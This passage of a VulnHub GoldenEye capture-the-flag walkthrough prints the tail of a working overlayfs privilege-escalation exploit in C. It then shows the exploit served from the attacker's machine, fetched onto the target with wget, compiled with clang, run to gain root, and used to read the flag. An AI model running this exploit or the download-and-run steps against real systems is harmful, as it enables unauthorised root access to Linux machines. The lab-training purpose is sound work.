    mkdir("/tmp/ns_sploit/o",0777);

    fprintf(stderr,"mount #1\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
// workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
            fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
            exit(-1);
        }
        file = ".access";
        chmod("/tmp/ns_sploit/work/work",0777);
    } else file = "ns_last_pid";

    chdir("/tmp/ns_sploit/o");
    rename(file,"ld.so.preload");

    chdir("/");
    umount("/tmp/ns_sploit/o");
    fprintf(stderr,"mount #2\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
            exit(-1);
        }
        chmod("/tmp/ns_sploit/work/work",0777);
    }

    chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
    umount("/tmp/ns_sploit/o");
}

int
main(int argc, char **argv)
{
    int status, fd, lib;
    pid_t wrapper, init;
    int clone_flags = CLONE_NEWNS | SIGCHLD;

    fprintf(stderr,"spawning threads\n");

    if((wrapper = fork()) == 0) {
        if(unshare(CLONE_NEWUSER) != 0)
            fprintf(stderr, "failed to create new user namespace\n");

        if((init = fork()) == 0) {
            pid_t pid =
                clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
            if(pid < 0) {
                fprintf(stderr, "failed to create new mount namespace\n");
                exit(-1);
            }

            waitpid(pid, &status, 0);

        }

        waitpid(init, &status, 0);
        return 0;
    }

    usleep(300000);

    wait(NULL);

    fprintf(stderr,"child threads done\n");

    fd = open("/etc/ld.so.preload",O_WRONLY);

    if(fd == -1) {
        fprintf(stderr,"exploit failed\n");
        exit(-1);
    }

    fprintf(stderr,"/etc/ld.so.preload created\n");
    fprintf(stderr,"creating shared library\n");
    lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
    write(lib,LIB,strlen(LIB));
    close(lib);
    lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
    if(lib != 0) {
        fprintf(stderr,"couldn't create dynamic library\n");
        exit(-1);
    }
    write(fd,"/tmp/ofs-lib.so\n",16);
    close(fd);
    system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
    execl("/bin/su","su",NULL);
}

The c code is saved to file oly.c and all references to gcc are replaced with clang

@TODO step through and fully understand exploit

root@kali:~/vulnhub/goldeneyev1# sed -i 's\gcc\clang\g' oly.c

Serve the modified exploit code on a python SimpleHTTPServer so that it can be downloaded on the target.

root@kali:~/vulnhub/goldeneyev1# root@kali:~/vulnhub/goldeneyev1# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.0.133.48 - - [08/Aug/2018 17:17:22] "GET /oly.c HTTP/1.1" 200 -

Download and compile the exploit on GoldenEye:

$ wget http://10.0.133.20/oly.c
wget http://10.0.133.20/oly.c
--2018-08-08 09:17:22--  http://10.0.133.20/oly.c
Connecting to 10.0.133.20:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3863 (3.8K) [text/plain]
Saving to: 'oly.c'

100%[======================================>] 3,863       --.-K/s   in 0s

2018-08-08 09:17:22 (723 MB/s) - 'oly.c' saved [3863/3863]
$ clang oly.c -o oly
clang oly.c -o oly
oly.c:61:1: warning: control may reach end of non-void function [-Wreturn-type]
}
^
oly.c:73:12: warning: implicit declaration of function 'unshare' is invalid in C99 [-Wimplicit-function-declaration]
        if(unshare(CLONE_NEWUSER) != 0)
           ^
oly.c:78:17: warning: implicit declaration of function 'clone' is invalid in C99 [-Wimplicit-function-declaration]
                clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
                ^
oly.c:84:13: warning: implicit declaration of function 'waitpid' is invalid in C99 [-Wimplicit-function-declaration]
            waitpid(pid, &status, 0);
            ^
oly.c:94:5: warning: implicit declaration of function 'wait' is invalid in C99 [-Wimplicit-function-declaration]
    wait(NULL);
    ^
5 warnings generated.
$ ls
ls
oly  oly.c

Run the exploit and escalate to root:

$ ./oly
./oly
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

Discover the flag hidden in /root

# cat /root/.flag.txt
cat /root/.flag.txt
Alec told me to place the codes here:

568628e0d993b1973adc718237da6e93

If you captured this make sure to go here.....
/006-final/xvf7-flag/

Since the /006-final/xvf7-flag/ path was already discovered (see above) with the low privilege shell theres no need to go back to it.